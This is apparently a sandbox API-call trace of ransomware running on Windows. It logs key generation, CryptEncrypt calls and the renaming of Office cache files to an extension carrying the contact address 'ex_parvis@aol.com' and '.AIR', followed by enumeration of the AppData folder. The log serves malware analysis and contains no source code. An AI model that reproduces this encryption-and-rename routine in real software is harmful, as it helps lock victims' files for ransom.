	[0096.819] GetFileSizeEx (in: hFile=0x28c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=36233052) returned 1
	[0096.819] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x228df5c
	[0096.819] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0096.819] GetProcessHeap () returned 0x540000
	[0096.819] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0096.819] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0096.819] WriteFile (in: hFile=0x28c, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0096.824] WriteFile (in: hFile=0x28c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0096.824] WriteFile (in: hFile=0x28c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0096.824] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x228df5c) returned 0x3c20020
	[0096.825] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x228df5c) returned 0x5eb0020
	[0096.826] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0096.826] ReadFile (in: hFile=0x28c, lpBuffer=0x3c20020, nNumberOfBytesToRead=0x228df5c, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0x228df5c, lpOverlapped=0x0) returned 1
	[0099.016] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0099.016] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0099.016] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll", dwFileAttributes=0x80) returned 1
	[0099.021] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 74
	[0099.021] GetProcessHeap () returned 0x540000
	[0099.021] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfa) returned 0x5b8568
	[0099.021] lstrcpyW (in: lpString1=0x5b8568, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll"
	[0099.021] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.021] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.023] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c
	[0099.024] GetProcessHeap () returned 0x540000
	[0099.024] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0099.024] GetFileSizeEx (in: hFile=0x28c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=7378792) returned 1
	[0099.024] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x709768
	[0099.024] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.024] GetProcessHeap () returned 0x540000
	[0099.024] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0099.024] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.024] WriteFile (in: hFile=0x28c, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.026] WriteFile (in: hFile=0x28c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.027] WriteFile (in: hFile=0x28c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.027] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x709768) returned 0x3c20020
	[0099.027] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x709768) returned 0x4330020
	[0099.028] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.028] ReadFile (in: hFile=0x28c, lpBuffer=0x3c20020, nNumberOfBytesToRead=0x709768, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0x709768, lpOverlapped=0x0) returned 1
	[0099.454] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0099.454] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0099.454] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe", dwFileAttributes=0x80) returned 1
	[0099.455] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 71
	[0099.455] GetProcessHeap () returned 0x540000
	[0099.455] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf4) returned 0x579cd8
	[0099.455] lstrcpyW (in: lpString1=0x579cd8, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe"
	[0099.455] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.455] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.458] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c
	[0099.458] GetProcessHeap () returned 0x540000
	[0099.458] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x579cd8 | out: hHeap=0x540000) returned 1
	[0099.458] GetFileSizeEx (in: hFile=0x28c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=174440) returned 1
	[0099.458] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x2a968
	[0099.458] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.458] GetProcessHeap () returned 0x540000
	[0099.458] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0099.458] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.458] WriteFile (in: hFile=0x28c, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.460] WriteFile (in: hFile=0x28c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.460] WriteFile (in: hFile=0x28c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.460] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x2a968) returned 0x3790048
	[0099.461] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x2a968) returned 0x37ba9b8
	[0099.461] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.461] ReadFile (in: hFile=0x28c, lpBuffer=0x3790048, nNumberOfBytesToRead=0x2a968, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3790048*, lpNumberOfBytesRead=0x3a1f778*=0x2a968, lpOverlapped=0x0) returned 1
	[0099.466] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0099.466] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0099.466] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml", dwFileAttributes=0x80) returned 1
	[0099.466] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 78
	[0099.466] GetProcessHeap () returned 0x540000
	[0099.466] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x102) returned 0x598b60
	[0099.466] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml"
	[0099.466] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.467] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.469] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c
	[0099.469] GetProcessHeap () returned 0x540000
	[0099.469] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0099.469] GetFileSizeEx (in: hFile=0x28c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=4274) returned 1
	[0099.469] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x10b2
	[0099.469] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.469] GetProcessHeap () returned 0x540000
	[0099.469] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0099.469] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.469] WriteFile (in: hFile=0x28c, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.471] WriteFile (in: hFile=0x28c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.471] WriteFile (in: hFile=0x28c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.471] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10b2) returned 0x5febb8
	[0099.471] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10b2) returned 0x5ffc78
	[0099.471] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.471] ReadFile (in: hFile=0x28c, lpBuffer=0x5febb8, nNumberOfBytesToRead=0x10b2, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5febb8*, lpNumberOfBytesRead=0x3a1f778*=0x10b2, lpOverlapped=0x0) returned 1
	[0099.472] SetFilePointer (in: hFile=0x28c, lDistanceToMove=-4274, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.472] WriteFile (in: hFile=0x28c, lpBuffer=0x5ffc78*, nNumberOfBytesToWrite=0x10b2, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5ffc78*, lpNumberOfBytesWritten=0x3a1f778*=0x10b2, lpOverlapped=0x0) returned 1
	[0099.472] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5febb8 | out: hHeap=0x540000) returned 1
	[0099.472] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5ffc78 | out: hHeap=0x540000) returned 1
	[0099.472] CloseHandle (hObject=0x28c) returned 1
	[0099.473] GetProcessHeap () returned 0x540000
	[0099.473] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0099.473] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0099.473] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0099.473] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fbd88 | out: hHeap=0x540000) returned 1
	[0099.473] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fbce0 | out: hHeap=0x540000) returned 1
	[0099.473] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5fbce0
	[0099.473] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0099.473] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0099.473] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0099.473] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0099.473] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi", dwFileAttributes=0x80) returned 1
	[0099.473] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 78
	[0099.473] GetProcessHeap () returned 0x540000
	[0099.473] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x102) returned 0x598b60
	[0099.474] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi"
	[0099.474] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.474] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.476] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c
	[0099.476] GetProcessHeap () returned 0x540000
	[0099.476] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0099.476] GetFileSizeEx (in: hFile=0x28c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=1992192) returned 1
	[0099.476] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x1e6600
	[0099.476] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.476] GetProcessHeap () returned 0x540000
	[0099.476] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0099.476] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.477] WriteFile (in: hFile=0x28c, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.479] WriteFile (in: hFile=0x28c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.479] WriteFile (in: hFile=0x28c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.479] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x1e6600) returned 0x3c20020
	[0099.479] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x1e6600) returned 0x3e10020
	[0099.479] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.480] ReadFile (in: hFile=0x28c, lpBuffer=0x3c20020, nNumberOfBytesToRead=0x1e6600, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0x1e6600, lpOverlapped=0x0) returned 1
	[0099.561] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xca71a630, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca71a630, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da470
	[0099.561] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0099.561] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0099.561] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0099.561] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0099.561] GetLastError () returned 0x0
	[0099.561] FindNextFileW (in: hFindFile=0x5da470, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xca71a630, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca71a630, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0099.561] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589668 | out: hHeap=0x540000) returned 1
	[0099.561] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0099.561] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0099.561] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0099.561] GetLastError () returned 0x0
